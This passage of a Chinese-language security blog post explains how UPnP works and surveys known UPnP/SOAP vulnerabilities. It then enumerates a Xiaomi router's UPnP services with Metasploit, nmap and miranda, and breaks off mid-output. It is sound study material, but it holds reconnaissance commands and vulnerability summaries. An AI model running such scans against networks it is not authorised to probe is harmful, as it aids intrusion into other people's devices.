class="number">10</span></span><br><span class="line">ST：ssdp：all</span><br></pre></td></tr></table></figure></p><p>所有其他UPnP设备或程序都需要通过使用UDP单播将类似的消息发送回设备来响应此消息，并宣布设备或程序实现哪些UPnP配置文件。对于每个配置文件，它实现一条消息发送：<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HTTP / <span class="number">1.1</span> <span class="number">200</span> OK</span><br><span class="line">CACHE-CONTROL：max-age = <span class="number">1800</span></span><br><span class="line">EXT：</span><br><span class="line">LOCATION：http：//<span class="number">10.0</span><span class="meta">.0</span><span class="meta">.138</span>：<span class="number">80</span> / IGD.xml</span><br><span class="line">SERVER：SpeedTouch <span class="number">510</span> <span class="number">4.0</span><span class="meta">.0</span><span class="meta">.9</span><span class="meta">.0</span> UPnP / <span class="number">1.0</span>（DG233B00011961）</span><br><span class="line"><span class="built_in">ST</span>：urn：schemas-upnp-org：service：WANPPPConnection：<span class="number">1</span></span><br><span class="line">USN：uuid：UPnP-SpeedTouch510 :: urn：schemas-upnp-org：service：WANPPPConnection：<span class="number">1</span></span><br></pre></td></tr></table></figure></p><p>类似地，当一个控制点加入到网络中的时候，它也能够搜索到网络中存在的、感兴趣的设备相关信息。这两种类型的基础交互是一种仅包含少量、重要相关设备信息或者它的某个服务。比如，类型、标识和指向更详细信息的链接。<br>UPnP检测协议是 <strong><em>基于简单服务发现协议（SSDP）</em></strong> 的。</p><h2 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h2><p>UPnP网络的下一步是描述。当一个控制点检测到一个设备时，它对该设备仍然知之甚少。为了使控制点了解更多关于该设备的信息或者和设备进行交互，控制点必须从设备发出的检测信息中包含的URL获取更多的信息。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830499/paper/114.png" alt><br>某个设备的UPnP描述是 <strong>XML</strong> 的方式,通过http协议，包括品牌、厂商相关信息，如型号名和编号、序列号、厂商名、品牌相关URL等。描述还包括一个嵌入式设备和服务列表，以及控制、事件传递和存在相关的URL。对于每种设备，描述还包括一个命令或动作列表，包括响应何种服务，针对各种动作的参数；这些变量描述出运行时设备的状态信息，并通过它们的数据类型、范围和事件来进行描述。</p><h2 id="控制"><a href="#控制" class="headerlink" title="控制"></a>控制</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830533/paper/1133.png" alt><br>UPnP网络的下一步是控制。当一个控制点获取到设备描述信息之后，它就可以向该设备发送指令了。为了实现此，控制点发送一个合适的控制消息至服务相关控制URL（包含在设备描述中）。<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">service</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">serviceType</span>&gt;</span> urn：schemas-upnp-org：service：WANPPPConnection：1 <span class="tag">&lt;/ <span class="attr">serviceType</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">serviceId</span>&gt;</span> urn：upnp-org： serviceId：wanpppc：pppoa <span class="tag">&lt;/ <span class="attr">serviceId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">controlURL</span>&gt;</span> / upnp / control / wanpppcpppoa <span class="tag">&lt;/ <span class="attr">controlURL</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">eventSubURL</span>&gt;</span> / upnp / event / wanpppcpppoa <span class="tag">&lt;/ <span class="attr">eventSubURL</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">SCPDURL</span>&gt;</span> /WANPPPConnection.xml <span class="tag">&lt;/ <span class="attr">SCPDURL</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/ <span class="attr">service</span>&gt;</span></span><br></pre></td></tr></table></figure></p><p>要发送SOAP请求，只需要controlURL标记内的URL。控制消息也是通过 <strong><em>简单对象访问协议（SOAP）</em></strong> 用XML来描述的。类似函数调用，服务通过返回动作相关的值来回应控制消息。动作的效果，如果有的话，会反应在用于刻画运行中服务的相关变量。</p><h2 id="事件通知"><a href="#事件通知" class="headerlink" title="事件通知"></a>事件通知</h2><p>下一步是事件通知。UPnP中的事件 <strong><em>协议基于GENA</em></strong> 。一个UPnP描述包括一组命令列表和刻画运行时状态信息的变量。服务在这些变量改变的时候进行更新，控制点可以进行订阅以获取相关改变。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830573/paper/115.png" alt><br>服务通过发送事件消息来发布更新。事件消息包括一个或多个状态信息变量以及它们的当前数值。这些消息也是采用XML的格式，用通用事件通知体系进行格式化。一个特殊的初始化消息会在控制点第一次订阅的时候发送，它包括服务相关的变量名及值。为了支持多个控制点并存的情形，事件通知被设计成对于所有的控制点都平行通知。因此，所有的订阅者同等地收到所有事件通知。<br>当状态变量更改时，新状态将发送到已订阅该事件的所有程序/设备。程序/设备可以通过eventSubURL来订阅服务的状态变量，该URL可以在LOCATION指向的URL中找到。<br><figure class="highlight bnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">&lt;service&gt;</span></span><br><span class="line">  <span class="attribute">&lt;serviceType&gt;</span> urn：schemas-upnp-org：service：WANPPPConnection：1 <span class="attribute">&lt;/ serviceType&gt;</span></span><br><span class="line">  <span class="attribute">&lt;serviceId&gt;</span> urn：upnp-org：serviceId：wanpppc：pppoa <span class="attribute">&lt;/ serviceId&gt;</span></span><br><span class="line">  <span class="attribute">&lt;controlURL&gt;</span> / upnp / control / wanpppcpppoa <span class="attribute">&lt;/ controlURL&gt;</span></span><br><span class="line">  <span class="attribute">&lt;eventSubURL&gt;</span> / upnp / event / wanpppcpppoa <span class="attribute">&lt;</span></span><br><span class="line"><span class="attribute">  &lt;SCPDURL&gt;</span> /WANPPPConnection.xml <span class="attribute">&lt;/ SCPDURL&gt;</span></span><br><span class="line"><span class="attribute">&lt;/ service&gt;</span></span><br></pre></td></tr></table></figure></p><h2 id="展示"><a href="#展示" class="headerlink" title="展示"></a>展示</h2><p>最后一步是展示。如果设备带有存在URL，那么控制点可以通过它来获取设备存在信息，即在浏览器中加载URL，并允许用户来进行相关控制或查看操作。具体支持哪些操作则是由存在页面和设备完成的。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555830618/paper/1111.png" alt></p><h2 id="NAT穿透"><a href="#NAT穿透" class="headerlink" title="NAT穿透"></a>NAT穿透</h2><p>UPnP为NAT（网络地址转换）穿透带来了一个解决方案：<strong>互联网网关设备协议（IGD）</strong>。NAT穿透允许UPnP数据包在没有用户交互的情况下，无障碍的通过路由器或者防火墙（假如那个路由器或者防火墙支持NAT）。</p><h1 id="SOAP和UPnP"><a href="#SOAP和UPnP" class="headerlink" title="SOAP和UPnP"></a>SOAP和UPnP</h1><table><thead><tr><th>协议</th><th>全称</th></tr></thead><tbody><tr><td>UPnP</td><td>Universal Plug and Play</td></tr><tr><td>SSDP</td><td>Simple Service Discovery Protocol</td></tr><tr><td>SCPD</td><td>Service Control Protocol Definition</td></tr><tr><td>SOAP</td><td>Simple Object Access Protocol</td></tr></tbody></table><h2 id="UPnP-Discovery"><a href="#UPnP-Discovery" class="headerlink" title="UPnP - Discovery"></a>UPnP - Discovery</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555576753/paper/1.png" alt></p><h2 id="UPnP-–-Description"><a href="#UPnP-–-Description" class="headerlink" title="UPnP – Description"></a>UPnP – Description</h2><ul><li>XML文件通常托管在高位的TCP端口</li><li>版本信息<br>upnp.org spec<br>通常为1.0</li><li>设备定义<br>型号名和编号、序列号、厂商名、品牌相关URL<br>服务列表：服务类型；SCPD URL；Control URL；Event URL<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555576810/paper/2.png" alt><h2 id="UPnP-–-SCPD"><a href="#UPnP-–-SCPD" class="headerlink" title="UPnP – SCPD"></a>UPnP – SCPD</h2></li><li>定义服务动作和参数的XML文件</li><li>版本信息<br>和描述一致</li><li>动作列表<br>动作名<br>参数：参数名、方向（输入输出）、变量名</li><li>变量列表<br>变量名、数据类型<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555577220/paper/3.png" alt><h2 id="UPnP-–-Control"><a href="#UPnP-–-Control" class="headerlink" title="UPnP – Control"></a>UPnP – Control</h2></li><li>这里用到了SOAP</li><li>主要是RPC服务或CGI脚本的前端</li><li>SOAP封装<br>• XML格式的API调用<br>• 描述XML中的服务类型<br>• 来自SCPD XML的动作名称和参数</li><li>POST封装到control URL<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555577719/paper/4.png" alt><h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a>TL;DR</h2><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555577820/paper/5.png" alt><h2 id="好的一面"><a href="#好的一面" class="headerlink" title="好的一面"></a>好的一面</h2></li><li>Control AV equipment</li><li>Home automation</li><li>Network administration</li><li>Physical security systems (ok, easy there buddy)</li><li>Industrial monitoring and control (uh…what?)</li><li>And this is just the official specs<br>All our devices can talk to each other! Brave new worlds of remote control and automation! Have your toaster turn on the lights, set the TV to the news channel, and send you a text message when breakfast is ready! The future is now! Nothing could possibly go wrong!<h2 id="关于安全"><a href="#关于安全" class="headerlink" title="关于安全"></a>关于安全</h2></li></ul><ol><li>嵌入式设备</li></ol><ul><li>有限的内存和处理能力</li><li>硬件和软件开发人员通常是完全不同的公司</li><li>复制和粘贴开发</li><li>保持低成本</li><li>不完全关心/懂行</li></ul><ol start="2"><li>部署</li></ol><ul><li>数以百万计的面向互联网的UPnP设备</li><li>要计算的供应商太多</li><li>前端是标准化的，后端甚至在同一供应商内也有所不同</li><li>难以修补/更新固件</li><li>仅仅因为你可以，并不意味着你应该</li></ul><ol start="3"><li>XML解析很难</li></ol><ul><li>需要大量系统资源</li><li>自由格式的用户提供的数据</li><li>2013年，2.5％的CVE与XML相关[2]，其中，近36％的患者CVSS严重程度为7或以上</li><li>随着XML的用例增长，版本也越来越多：递归错误，XXE，命令注入等……</li></ul><h1 id="攻击面"><a href="#攻击面" class="headerlink" title="攻击面"></a>攻击面</h1><ul><li>UPnP服务<br>• HTTP头解析<br>• SSDP解析<br>• OS命令注入<br>• 信息披露</li><li>SOAP服务<br>• HTTP头解析<br>• XML解析<br>• 注射用品<br>• OS命令<br>• SQL注入<br>• SOAP注入<br>• 信息披露<br>• 可疑级别的未经身份验证的设备控制<h2 id="Attack-surface-–-UPnP"><a href="#Attack-surface-–-UPnP" class="headerlink" title="Attack surface – UPnP"></a>Attack surface – UPnP</h2></li><li><p><a href="https://community.rapid7.com/docs/DOC-2150" target="_blank" rel="noopener">CVE-2012-5958</a><br>去年由HD Moore（众多之一）披露；调用strncpy将ST头中的字符串复制到TempBuf[COMMAND_LEN]；strncpy的长度参数基于冒号之间的字符数<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555580242/paper/6.png" alt></p></li><li><p>D-Link DIR-815 <a href="http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html" target="_blank" rel="noopener">UPnP命令注入</a><br>去年由Zach Cutlip披露;ST头的内容作为参数传递给M-SEARCH.sh;无需验证<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555580904/paper/7.png" alt></p></li></ul><h2 id="Attack-surface-–-SOAP"><a href="#Attack-surface-–-SOAP" class="headerlink" title="Attack surface – SOAP"></a>Attack surface – SOAP</h2><ul><li><p>XBMC soap_action_name<a href="http://www.exploit-db.com/exploits/15347/" target="_blank" rel="noopener">缓冲区溢出</a><br>由n00b于2010年10月公布;ProcessHttpPostRequest函数分配静态大小的缓冲区;调用sscanf将SOAPAction标头的值复制到其中，没有边界检查<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581152/paper/8.png" alt></p></li><li><p>博通SetConnectionType<a href="http://sebug.net/paper/Exploits-Archives/2013-exploits/1301-exploits/DC-2013-01-003.txt" target="_blank" rel="noopener">格式字符串漏洞</a><br>去年Leon Juranic和Vedran Kajic透露；SetConnectionType操作将NewConnectionType参数的值提供给snprintf；不对用户控制的值进行检查<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581385/paper/9.png" alt></p></li><li><p><a href="http://www.pnigos.com/?p=260" target="_blank" rel="noopener">CVE-2014-3242</a><br>今年早些时候由pnig0s披露;SOAPpy允许在SOAP请求中声明用户定义的XML外部实体;不对用户控制的值进行检查<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581672/paper/10.png" alt></p></li><li><p><a href="http://seclists.org/fulldisclosure/2014/May/32" target="_blank" rel="noopener">CVE-2014-2928</a><br>Brandon Perry今年早些时候公布了（PBerry Crunch！）;F5 iControl API set_hostname操作将hostname参数的值传递给shell;再一次，不对用户控制的值进行消毒<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555581840/paper/11.png" alt></p></li><li><p><a href="http://toor.do/DEFCON-19-Garcia-UPnP-Mapping-WP.pdf" target="_blank" rel="noopener">CVE-2011-4499，CVE-2011-4500，CVE-2011-4501，CVE-2011-4503，CVE-2011-4504，CVE-2011-4505，CVE-2011-4506，更多？</a><br>Daniel Garcia在Defcon 19上披露; UPnP IGD 使用AddPortMapping和DeletePortMapping等操作来允许远程管理路由规则;缺乏身份验证，可在WAN接口上使用; 使攻击者能够执行：•NAT遍历 •外部/内部主机端口映射 •内部LAN的外部网络扫描</p></li></ul><h2 id="如何测试"><a href="#如何测试" class="headerlink" title="如何测试"></a>如何测试</h2><ul><li>了解您的网络<br>M-SEARCH你连接的每个网络以监听新的NOTIFY消息</li><li>如果您不需要UPnP，请将其禁用<br>如果不在设备上，则在路由器上</li><li>随时掌握固件更新<br>并非总是自动的</li><li>模糊测试<br>Burp – <a href="http://portswigger.net/burp/" target="_blank" rel="noopener">http://portswigger.net/burp/</a><br>WSFuzzer – <a href="https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project" target="_blank" rel="noopener">https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project</a><br>Miranda – <a href="http://code.google.com/p/miranda-upnp/" target="_blank" rel="noopener">http://code.google.com/p/miranda-upnp/</a></li></ul><h1 id="对小米WIFI路由器的UPnP分析"><a href="#对小米WIFI路由器的UPnP分析" class="headerlink" title="对小米WIFI路由器的UPnP分析"></a>对小米WIFI路由器的UPnP分析</h1><h2 id="使用工具扫描"><a href="#使用工具扫描" class="headerlink" title="使用工具扫描"></a>使用工具扫描</h2><h3 id="使用Metasploit检查"><a href="#使用Metasploit检查" class="headerlink" title="使用Metasploit检查"></a>使用Metasploit检查</h3><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">msf5 &gt; use auxiliary/scanner/upnp/ssdp_msearch</span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; set RHOSTS <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.0</span>/<span class="number">24</span></span><br><span class="line">RHOSTS =&gt; <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.0</span>/<span class="number">24</span></span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Sending UPnP SSDP probes to <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.0</span>-&gt;<span class="number">192.168</span><span class="meta">.31</span><span class="meta">.255</span> (<span class="number">256</span> hosts)</span><br><span class="line">[*] <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.1</span>:<span class="number">1900</span> SSDP MiWiFi/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span> | http://<span class="number">192.168</span><span class="meta">.31</span><span class="meta">.1</span>:<span class="number">5351</span>/rootDesc.xml | uuid:f3539dd5-8dc5-420c-<span class="number">9070</span>-c6f66d27fc8c::upnp:rootdevice</span><br><span class="line">[*] Scanned <span class="number">256</span> of <span class="number">256</span> hosts (<span class="number">100</span>% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></table></figure><p>从中可以得到这些信息：</p><ul><li>UPnP/1.1</li><li>MiniUPnPd/2.0</li></ul><h3 id="使用nmap进行扫描"><a href="#使用nmap进行扫描" class="headerlink" title="使用nmap进行扫描"></a>使用nmap进行扫描</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">nmap -p1900，5351 192.168.31.1</span><br><span class="line"></span><br><span class="line">PORT     STATE    SERVICE</span><br><span class="line">1900/tcp filtered upnp</span><br><span class="line">5351/tcp open     nat-pmp</span><br></pre></td></tr></table></figure><p><strong><em>nat-pmp</em></strong><br>NAT端口映射协议（英语：NAT Port Mapping Protocol，缩写NAT-PMP）是一个能自动创建网络地址转换（NAT）设置和端口映射配置而无需用户介入的网络协议。该协议能自动测定NAT网关的外部IPv4地址，并为应用程序提供与对等端交流通信的方法。NAT-PMP于2005年由苹果公司推出，为更常见的ISO标准互联网网关设备协议（被许多NAT路由器实现）的一个替代品。该协议由互联网工程任务组（IETF）在RFC 6886中发布。<br>NAT-PMP使用用户数据报协议（UDP），在5351端口运行。该协议没有内置的身份验证机制，因为转发一个端口通常不允许任何活动，也不能用STUN方法实现。NAT-PMP相比STUN的好处是它不需要STUN服务器，并且NAT-PMP映射有一个已知的过期时间，应用可以避免低效地发送保活数据包。<br>NAT-PMP是端口控制协议（PCP）的前身。<br><a href="https://laucyun.com/25118b151a3386b7beff250835fe7e98.html" target="_blank" rel="noopener">https://laucyun.com/25118b151a3386b7beff250835fe7e98.html</a><br>2014年10月，Rapid7安全研究员Jon Hart公布，因厂商对NAT-PMP协议设计不当，估计公网上有1200万台网络设备受到NAT-PMP漏洞的影响。NAT-PMP协议的规范中特别指明，NAT网关不能接受来自外网的地址映射请求，但一些厂商的设计并未遵守此规定。黑客可能对这些设备进行恶意的端口映射，进行流量反弹、代理等攻击。</p><h3 id="netstat扫描"><a href="#netstat扫描" class="headerlink" title="netstat扫描"></a>netstat扫描</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Proto Recv-Q Send-Q Local<span class="built_in"> Address </span>        Foreign<span class="built_in"> Address </span>   State    <span class="keyword">in</span> out PID/Program name</span><br><span class="line">tcp   0      0      :::5351               :::*               LISTEN   0 0 18068/miniupnpd</span><br><span class="line">udp   0      0      192.168.31.1:5351     0.0.0.0:*          0        0 18068/miniupnpd</span><br><span class="line">udp   0      0      0.0.0.0:1900          0.0.0.0:*          1414113  1827652 18068/miniupnpd</span><br></pre></td></tr></table></figure><p>端口1900在UPnP发现的过程中使用，5351通常为端口映射协议NAT-PMP运行的端口</p><h3 id="miranda"><a href="#miranda" class="headerlink" title="miranda"></a><a href="https://www.ethicalhacker.net/columns/heffner/plug-n-play-network-hacking/" target="_blank" rel="noopener">miranda</a></h3><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 miranda.py -i wlx44334c388fbd -v</span><br><span class="line"></span><br><span class="line">Miranda v1.<span class="number">3</span></span><br><span class="line">The interactive UPnP client</span><br><span class="line">Craig Heffner, http://www.devttys0.com</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Binding to <span class="keyword">interface</span> wlx44334c388fbd ...</span><br><span class="line"></span><br><span class="line">Verbose mode enabled!</span><br><span class="line">upnp&gt; msearch</span><br><span class="line"></span><br><span class="line">Entering discovery mode <span class="keyword">for</span> <span class="symbol">'upnp</span>:rootdevice', Ctl+C to stop...</span><br><span class="line"></span><br><span class="line">****************************************************************</span><br><span class="line">SSDP reply message from <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span></span><br><span class="line">XML file <span class="keyword">is</span> located <span class="keyword">at</span> http://<span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span>/rootDesc.xml</span><br><span class="line">Device <span class="keyword">is</span> running MiWiFi/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span></span><br><span class="line">****************************************************************</span><br><span class="line"></span><br><span class="line">upnp&gt; host get <span class="number">0</span></span><br><span class="line"></span><br><span class="line">Requesting device <span class="keyword">and</span> service info <span class="keyword">for</span> <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span> (this could take a few seconds)...</span><br><span class="line"></span><br><span class="line">Device urn:schemas-upnp-org:device:WANDevice:<span class="number">1</span> does <span class="keyword">not</span> have a presentationURL</span><br><span class="line">Device urn:schemas-upnp-org:device:WANConnectionDevice:<span class="number">1</span> does <span class="keyword">not</span> have a presentationURL</span><br><span class="line">Host data enumeration complete!</span><br><span class="line"></span><br><span class="line">upnp&gt; host list</span><br><span class="line"></span><br><span class="line">[<span class="number">0</span>] <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span></span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span></span><br><span class="line"></span><br><span class="line">xmlFile : <span class="type">http</span>://<span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span>/rootDesc.xml</span><br><span class="line">name : 192.168.31.1:5351</span><br><span class="line">proto : <span class="type">http</span>://</span><br><span class="line">serverType : <span class="type">MiWiFi</span>/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span></span><br><span class="line">upnpServer : <span class="type">MiWiFi</span>/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span></span><br><span class="line">dataComplete : <span class="type">True</span></span><br><span class="line">deviceList : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList</span><br><span class="line"></span><br><span class="line">InternetGatewayDevice : &#123;&#125;</span><br><span class="line">WANDevice : &#123;&#125;</span><br><span class="line">WANConnectionDevice : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice</span><br><span class="line"></span><br><span class="line">  manufacturerURL : <span class="type">http</span>://miniupnp.free.fr/</span><br><span class="line">  modelName : <span class="type">MiniUPnPd</span></span><br><span class="line">  UPC : 000000000000</span><br><span class="line">  modelNumber : 20180830</span><br><span class="line">  friendlyName : <span class="type">WANConnectionDevice</span></span><br><span class="line">  fullName : <span class="type">urn</span>:schemas-upnp-org:device:WANConnectionDevice:<span class="number">1</span></span><br><span class="line">  modelDescription : <span class="type">MiniUPnP</span> daemon</span><br><span class="line">  UDN : <span class="type">uuid</span>:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8e</span><br><span class="line">  modelURL : <span class="type">http</span>://miniupnp.free.fr/</span><br><span class="line">  manufacturer : <span class="type">MiniUPnP</span></span><br><span class="line">  services : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice services WANIPConnection</span><br><span class="line"></span><br><span class="line">    eventSubURL : /<span class="type">evt</span>/IPConn</span><br><span class="line">    controlURL : /<span class="type">ctl</span>/IPConn</span><br><span class="line">    serviceId : <span class="type">urn</span>:upnp-org:serviceId:WANIPConn1</span><br><span class="line">    SCPDURL : /<span class="type">WANIPCn.xml</span></span><br><span class="line">    fullName : <span class="type">urn</span>:schemas-upnp-org:service:WANIPConnection:<span class="number">1</span></span><br><span class="line">    actions : &#123;&#125;</span><br><span class="line">    serviceStateVariables : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice services WANIPConnection actions</span><br><span class="line"></span><br><span class="line">      AddPortMapping : &#123;&#125;</span><br><span class="line">      GetNATRSIPStatus : &#123;&#125;</span><br><span class="line">      GetGenericPortMappingEntry : &#123;&#125;</span><br><span class="line">      GetSpecificPortMappingEntry : &#123;&#125;</span><br><span class="line">      ForceTermination : &#123;&#125;</span><br><span class="line">      GetExternalIPAddress : &#123;&#125;</span><br><span class="line">      GetConnectionTypeInfo : &#123;&#125;</span><br><span class="line">      GetStatusInfo : &#123;&#125;</span><br><span class="line">      SetConnectionType : &#123;&#125;</span><br><span class="line">      DeletePortMapping : &#123;&#125;</span><br><span class="line">      RequestConnection : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice services WANIPConnection serviceStateVariables</span><br><span class="line"></span><br><span class="line">        InternalClient : &#123;&#125;</span><br><span class="line">        Uptime : &#123;&#125;</span><br><span class="line">        PortMappingLeaseDuration : &#123;&#125;</span><br><span class="line">        PortMappingDescription : &#123;&#125;</span><br><span class="line">        RemoteHost : &#123;&#125;</span><br><span class="line">        PossibleConnectionTypes : &#123;&#125;</span><br><span class="line">        ExternalPort : &#123;&#125;</span><br><span class="line">        RSIPAvailable : &#123;&#125;</span><br><span class="line">        ConnectionStatus : &#123;&#125;</span><br><span class="line">        PortMappingNumberOfEntries : &#123;&#125;</span><br><span class="line">        ExternalIPAddress : &#123;&#125;</span><br><span class="line">        ConnectionType : &#123;&#125;</span><br><span class="line">        NATEnabled : &#123;&#125;</span><br><span class="line">        LastConnectionError : &#123;&#125;</span><br><span class="line">        InternalPort : &#123;&#125;</span><br><span class="line">        PortMappingProtocol : &#123;&#125;</span><br><span class="line">        PortMappingEnabled : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host summary <span class="number">0</span></span><br><span class="line"></span><br><span class="line">          Host: <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span></span><br><span class="line">          XML File: http://<span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span>/rootDesc.xml</span><br><span class="line">          InternetGatewayDevice</span><br><span class="line">          manufacturerURL: http://www.mi.com</span><br><span class="line">          modelName: 